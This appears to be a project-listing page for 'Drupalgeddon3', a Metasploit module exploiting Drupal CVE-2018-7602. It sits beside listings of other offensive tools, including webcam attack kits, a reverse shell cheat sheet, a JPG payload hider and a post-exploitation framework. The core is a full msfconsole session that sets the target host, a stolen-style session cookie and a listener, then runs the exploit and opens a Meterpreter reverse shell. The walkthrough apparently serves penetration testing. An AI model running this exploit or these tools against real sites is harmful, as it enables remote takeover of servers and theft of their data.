Entropy Toolkit is a set of tools to provide Netwave and GoAhead IP webcams attacks. Entropy Toolkit is a powerful toolkit for webcams penetration testing.

Stars: ✭ 126 (+600%)

Mutual labels: exploit, metasploit

Shellver

Reverse Shell Cheat Sheet TooL

Stars: ✭ 258 (+1333.33%)

Mutual labels: exploit, metasploit

Cve 2018 7600

💀Proof-of-Concept for CVE-2018-7600 Drupal SA-CORE-2018-002

Stars: ✭ 330 (+1733.33%)

Mutual labels: drupal, exploit

Hackers Tool Kit

Its a framework filled with alot of options and hacking tools you use directly in the script from brute forcing to payload making im still adding more stuff i now have another tool out called htkl-lite its hackers-tool-kit just not as big and messy to see updates check on my instagram @tuf_unkn0wn or if there are any problems message me on instagram

Stars: ✭ 211 (+1072.22%)

Mutual labels: exploit, metasploit

docker-metasploit

Metasploit framework with steroids

Stars: ✭ 49 (+172.22%)

Mutual labels: exploit, metasploit

M0b Tool

exploit

Stars: ✭ 68 (+277.78%)

Mutual labels: drupal, exploit

Imgbackdoor

Hide your payload into .jpg file

Stars: ✭ 87 (+383.33%)

Mutual labels: exploit, metasploit

Mouse

Mouse Framework is an iOS and macOS post-exploitation framework that gives you a command line session with extra functionality between you and a target machine using only a simple Mouse payload. Mouse gives you the power and convenience of uploading and downloading files, tab completion, taking pictures, location tracking, shell command execution, escalating privileges, password retrieval, and much more.

Stars: ✭ 186 (+933.33%)

Mutual labels: exploit, metasploit

Xattacker

X Attacker Tool ☣ Website Vulnerability Scanner & Auto Exploiter

Stars: ✭ 897 (+4883.33%)

Mutual labels: drupal, exploit

Exphub

Exphub[漏洞利用脚本库] 包括Webloigc、Struts2、Tomcat、Nexus、Solr、Jboss、Drupal的漏洞利用脚本，最新添加CVE-2020-14882、CVE-2020-11444、CVE-2020-10204、CVE-2020-10199、CVE-2020-1938、CVE-2020-2551、CVE-2020-2555、CVE-2020-2883、CVE-2019-17558、CVE-2019-6340

Stars: ✭ 3,056 (+16877.78%)

Mutual labels: drupal, exploit

reosploit

A Tool that Finds, Enumerates, and Exploits Reolink Cameras.

Stars: ✭ 89 (+394.44%)

Mutual labels: exploit

IAT API

Assembly block for finding and calling the windows API functions inside import address table(IAT) of the running PE file.

Stars: ✭ 63 (+250%)

Mutual labels: exploit

cve-2016-1764

Extraction of iMessage Data via XSS

Stars: ✭ 52 (+188.89%)

Mutual labels: exploit

ManageEngineFileUploadExploit

POC script for the ManageEngine Multiple Products Authenticated File Upload Exploit

Stars: ✭ 14 (-22.22%)

Mutual labels: exploit

View All Similar Projects ➔

Drupal < 7.58 - 'Drupalgeddon3' Authenticated Remote Code Execution (Metasploit)

Author:

SixP4ck3r Research and port to MSF
Blaklis Initial POC

Metasploit Module for Drupalgeddon 3:

https://www.exploit-db.com/exploits/44557/

Original Exploit:

exploit-db.com

Drupal Afected Versions & Details:

https://www.drupal.org/sa-core-2018-004

Notes:

CVE-2018-7602 / SA-CORE-2018-004
A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site Which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution

Example Metasploit

Output Metasploit

six@ub:/opt/metasploit-framework$ ./msfconsole 
[-] ***rting the Metasploit Framework console...|
[-] * WARNING: No database support: No database YAML file
[-] ***
                                                  
 _                                                    _
/ \    /\         __                         _   __  /_/ __
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\


       =[ metasploit v5.0.0-dev-8164379                   ]
+ -- --=[ 1758 exploits - 1006 auxiliary - 306 post       ]
+ -- --=[ 536 payloads - 41 encoders - 10 nops            ]
+ -- --=[ ** This is Metasploit 5 development branch **   ]

msf5 > use unix/webapp/drupal_drupalgeddon3
msf5 exploit(unix/webapp/drupal_drupalgeddon3) > set RHOST 192.168.1.200
RHOST => 192.168.1.200
msf5 exploit(unix/webapp/drupal_drupalgeddon3) > set DRUPAL_SESSION SESSad4467153480b84038526cd43a9ce852=AYyCoZ07NvaDObWxYYEfAOJKETi2atRdEU0B6yEBiRI
DRUPAL_SESSION => SESSad4467153480b84038526cd43a9ce852=AYyCoZ07NvaDObWxYYEfAOJKETi2atRdEU0B6yEBiRI
msf5 exploit(unix/webapp/drupal_drupalgeddon3) > set DRUPAL_NODE 3
DRUPAL_NODE => 3
msf5 exploit(unix/webapp/drupal_drupalgeddon3) > set LHOST 192.168.1.200
LHOST => 192.168.1.200
msf5 exploit(unix/webapp/drupal_drupalgeddon3) > exploit

[*] Started reverse TCP handler on 192.168.1.200:4444 
[*] Token Form -> u73s2UzA1B056tdlItiAfpeolb5OVwLGEF5EAFH0bJY
[*] Token Form_build_id -> form-FtN_yMsgJI9GlviMbemIkYxgJ97xsUZ7Lg2hOtW1IlI
[*] Sending stage (37775 bytes) to 192.168.1.200
[*] Meterpreter session 1 opened (192.168.1.200:4444 -> 192.168.1.200:60156) at 2018-04-29 15:04:33 -0400

meterpreter >

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

rithchard / Drupalgeddon3

Programming Languages

Labels

Projects that are alternatives of or similar to Drupalgeddon3

Drupal < 7.58 - 'Drupalgeddon3' Authenticated Remote Code Execution (Metasploit)

Example Metasploit

Output Metasploit